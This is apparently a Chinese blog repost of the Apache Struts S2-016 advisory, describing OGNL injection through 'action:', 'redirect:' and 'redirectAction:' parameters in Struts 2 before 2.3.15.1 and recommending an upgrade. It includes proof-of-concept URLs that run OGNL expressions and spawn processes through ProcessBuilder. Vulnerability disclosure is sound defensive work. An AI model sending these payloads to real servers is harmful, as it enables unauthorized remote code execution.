Struts 2的漏洞 与需要版本升级(From Apache官网)

 Struts 2的漏洞原理：

Struts又爆远程代码执行漏洞！在这次的漏洞中，攻击者可以通过操纵参数远程执行恶意代码。Struts 2.3.15.1之前的版本，参数action的值redirect以及redirectAction没有正确过滤，导致ognl代码执行。

 

The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with "action:" or "redirect:", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.

In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.

 

In the Struts Blank App, open following URLs.

1. Simple Expression - the parameter names are evaluated as OGNL.
   1. http://host/struts2-blank/example/X.action?action:%25{3*4}
   2. http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}

1. Command Execution
   1. http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
   2. http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
   3. http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

 

It is strongly recommended to upgrade to Struts 2.3.15.1, which contains the corrected Struts2-Core library.

 

from:http://www.cnblogs.com/security4399/ 漏洞信息库

from:http://struts.apache.org/release/2.3.x/docs/s2-016.html